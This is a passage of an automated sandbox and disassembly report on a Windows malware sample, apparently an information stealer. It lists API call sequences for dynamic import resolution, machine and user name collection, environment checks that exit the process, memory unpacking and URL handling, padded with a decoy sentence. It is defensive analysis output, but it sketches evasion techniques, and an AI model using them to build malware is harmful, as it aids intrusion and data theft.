27449 41a9b0 4 API calls 27449->27451 27450 41a8a0 lstrcpy 27450->27451 27451->27445 27451->27446 27451->27449 27451->27450 27542 41aad0 27452->27542 27454 4117c4 StrCmpCA 27455 4117d7 27454->27455 27456 4117cf ExitProcess 27454->27456 27457 4117e7 strtok_s 27455->27457 27460 4117f4 27457->27460 27458 4119c2 27458->26375 27459 41199e strtok_s 27459->27460 27460->27458 27460->27459 27461 4118ad StrCmpCA 27460->27461 27462 4118cf StrCmpCA 27460->27462 27463 4118f1 StrCmpCA 27460->27463 27464 411951 StrCmpCA 27460->27464 27465 411970 StrCmpCA 27460->27465 27466 411913 StrCmpCA 27460->27466 27467 411932 StrCmpCA 27460->27467 27468 41185d StrCmpCA 27460->27468 27469 41187f StrCmpCA 27460->27469 27470 41a820 lstrlenA lstrcpy 27460->27470 27471 41a820 2 API calls 27460->27471 27461->27460 27462->27460 27463->27460 27464->27460 27465->27460 27466->27460 27467->27460 27468->27460 27469->27460 27470->27460 27471->27459 27472->26381 27473->26383 27474->26389 27475->26391 27476->26397 27477->26399 27478->26403 27479->26407 27480->26411 27481->26417 27482->26419 27483->26423 27484->26437 27485->26441 27486->26440 27487->26436 27488->26440 27489->26458 27490->26443 27491->26447 27492->26448 27493->26454 27494->26455 27495->26461 27496->26468 27497->26470 27498->26494 27499->26497 27500->26498 27501->26493 27502->26498 27503->26507 27506 41a7a0 lstrcpy 27505->27506 27507 401683 27506->27507 27508 41a7a0 lstrcpy 27507->27508 27509 401695 27508->27509 27510 41a7a0 lstrcpy 27509->27510 27511 4016a7 27510->27511 27512 41a7a0 lstrcpy 27511->27512 27513 4015a3 27512->27513 27513->27233 27538 401030 27514->27538 27518 404838 lstrlenA 27541 41aad0 27518->27541 27520 404848 InternetCrackUrlA 27521 404867 27520->27521 27521->27310 27523 409af9 LocalAlloc 27522->27523 27524 404eee 27522->27524 27523->27524 27525 409b14 CryptStringToBinaryA 27523->27525 27524->27332 27524->27334 27525->27524 27526 409b39 LocalFree 27525->27526 27526->27524 27527->27326 27528->27329 27529->27349 27530->27364 
27531->27377 27532->27397 27533->27409 27534->27429 27535->27435 27536->27437 27537->27444 27539 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27538->27539 27540 41aad0 27539->27540 27540->27518 27541->27520 27542->27454 27678 416ab1 902 API calls 27641 4069f3 7 API calls 27642 b3d106 41 API calls __amsg_exit 27543 b20005 27548 b2092b GetPEB 27543->27548 27545 b20030 27549 b2003c 27545->27549 27548->27545 27550 b20049 27549->27550 27562 b20e0f SetErrorMode SetErrorMode 27550->27562 27555 b20265 27556 b202ce VirtualProtect 27555->27556 27557 b2030b 27556->27557 27558 b20439 VirtualFree 27557->27558 27561 b204be LoadLibraryA 27558->27561 27560 b208c7 27561->27560 27563 b20223 27562->27563 27564 b20d90 27563->27564 27565 b20dad 27564->27565 27566 b20238 VirtualAlloc 27565->27566 27567 b20dbb GetPEB 27565->27567 27566->27555 27567->27566 27680 b36a0a ExitProcess 27681 41cafe 219 API calls 4 library calls 27682 b3cd97 170 API calls setSBUpLow 27683 b3be78 162 API calls 2 library calls 26114 401190 26121 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26114->26121 26116 40119e 26117 4011cc 26116->26117 26123 417850 GetProcessHeap HeapAlloc GetUserNameA 26116->26123 26119 4011b7 26119->26117 26120 4011c4 ExitProcess 26119->26120 26122 417939 26121->26122 26122->26116 26124 4178c3 26123->26124 26124->26119 27616 b33823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27646 b2fd67 152 API calls 27684 41ce9f 69 API calls __amsg_exit 27617 b3140b strtok_s 27618 b33823 6 API calls 27619 4088a4 RaiseException task __CxxThrowException@8 27620 4180a5 GetProcessHeap HeapFree 27621 b36c57 692 API calls 27649 b36d18 646 API calls 27622 b3102b StrCmpCA strtok_s lstrlen lstrcpy 27651 41b9b0 RtlUnwind 27686 b33b7d 91 API calls 2 library calls 27687 b36a40 6 API calls

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                        • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                        • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                        • strlen.MSVCRT ref: 004046F0
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                        • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                        Strings
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                        • API String ID: 2127927946-2218711628
                                                        • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                        • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocNameProcessUser
                                                        • String ID:
                                                        • API String ID: 1206570057-0
                                                        • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                        • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                        • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                        • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                        APIs
                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                        • ExitProcess.KERNEL32 ref: 0040117E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitInfoProcessSystem
                                                        • String ID:
                                                        • API String ID: 752954902-0
                                                        • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                        • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                        • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                        • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                        Control-flow Graph

                                                        control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                        APIs
                                                        • GetProcAddress.KERNEL32(74DD0000,007F85A0), ref: 00419C2D
                                                        • GetProcAddress.KERNEL32(74DD0000,007F85E0), ref: 00419C45
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA330), ref: 00419C5E
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA348), ref: 00419C76
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA2E8), ref: 00419C8E
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA360), ref: 00419CA7
                                                        • GetProcAddress.KERNEL32(74DD0000,007F7D80), ref: 00419CBF
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA300), ref: 00419CD7
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA318), ref: 00419CF0
                                                        • GetProcAddress.KERNEL32(74DD0000,00829690), ref: 00419D08
                                                        • GetProcAddress.KERNEL32(74DD0000,00829558), ref: 00419D20
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8560), ref: 00419D39
                                                        • GetProcAddress.KERNEL32(74DD0000,007F86C0), ref: 00419D51
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8600), ref: 00419D69
                                                        • GetProcAddress.KERNEL32(74DD0000,007F85C0), ref: 00419D82
                                                        • GetProcAddress.KERNEL32(74DD0000,00829498), ref: 00419D9A
                                                        • GetProcAddress.KERNEL32(74DD0000,00829630), ref: 00419DB2
                                                        • GetProcAddress.KERNEL32(74DD0000,007F7DA8), ref: 00419DCB
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8480), ref: 00419DE3
                                                        • GetProcAddress.KERNEL32(74DD0000,008294E0), ref: 00419DFB
                                                        • GetProcAddress.KERNEL32(74DD0000,00829420), ref: 00419E14
                                                        • GetProcAddress.KERNEL32(74DD0000,00829648), ref: 00419E2C
                                                        • GetProcAddress.KERNEL32(74DD0000,008294F8), ref: 00419E44
                                                        • GetProcAddress.KERNEL32(74DD0000,007F84A0), ref: 00419E5D
                                                        • GetProcAddress.KERNEL32(74DD0000,008296F0), ref: 00419E75
                                                        • GetProcAddress.KERNEL32(74DD0000,00829528), ref: 00419E8D
                                                        • GetProcAddress.KERNEL32(74DD0000,00829450), ref: 00419EA6
                                                        • GetProcAddress.KERNEL32(74DD0000,008295E8), ref: 00419EBE
                                                        • GetProcAddress.KERNEL32(74DD0000,00829438), ref: 00419ED6
                                                        • GetProcAddress.KERNEL32(74DD0000,008295B8), ref: 00419EEF
                                                        • GetProcAddress.KERNEL32(74DD0000,00829660), ref: 00419F07
                                                        • GetProcAddress.KERNEL32(74DD0000,00829510), ref: 00419F1F
                                                        • GetProcAddress.KERNEL32(74DD0000,00829678), ref: 00419F38
                                                        • GetProcAddress.KERNEL32(74DD0000,007F2A08), ref: 00419F50
                                                        • GetProcAddress.KERNEL32(74DD0000,008295A0), ref: 00419F68
                                                        • GetProcAddress.KERNEL32(74DD0000,008294B0), ref: 00419F81
                                                        • GetProcAddress.KERNEL32(74DD0000,007F84E0), ref: 00419F99
                                                        • GetProcAddress.KERNEL32(74DD0000,00829468), ref: 00419FB1
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8540), ref: 00419FCA
                                                        • GetProcAddress.KERNEL32(74DD0000,008295D0), ref: 00419FE2
                                                        • GetProcAddress.KERNEL32(74DD0000,00829480), ref: 00419FFA
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8580), ref: 0041A013
                                                        • GetProcAddress.KERNEL32(74DD0000,007F80C0), ref: 0041A02B
                                                        • LoadLibraryA.KERNEL32(008294C8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                        • LoadLibraryA.KERNEL32(00829600,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                        • LoadLibraryA.KERNEL32(00829618,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                        • LoadLibraryA.KERNEL32(00829540,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                        • LoadLibraryA.KERNEL32(00829570,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                        • LoadLibraryA.KERNEL32(00829588,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                        • LoadLibraryA.KERNEL32(008296A8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                        • LoadLibraryA.KERNEL32(008296C0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                        • GetProcAddress.KERNEL32(75290000,007F82A0), ref: 0041A0DA
                                                        • GetProcAddress.KERNEL32(75290000,008296D8), ref: 0041A0F2
                                                        • GetProcAddress.KERNEL32(75290000,00826738), ref: 0041A10A
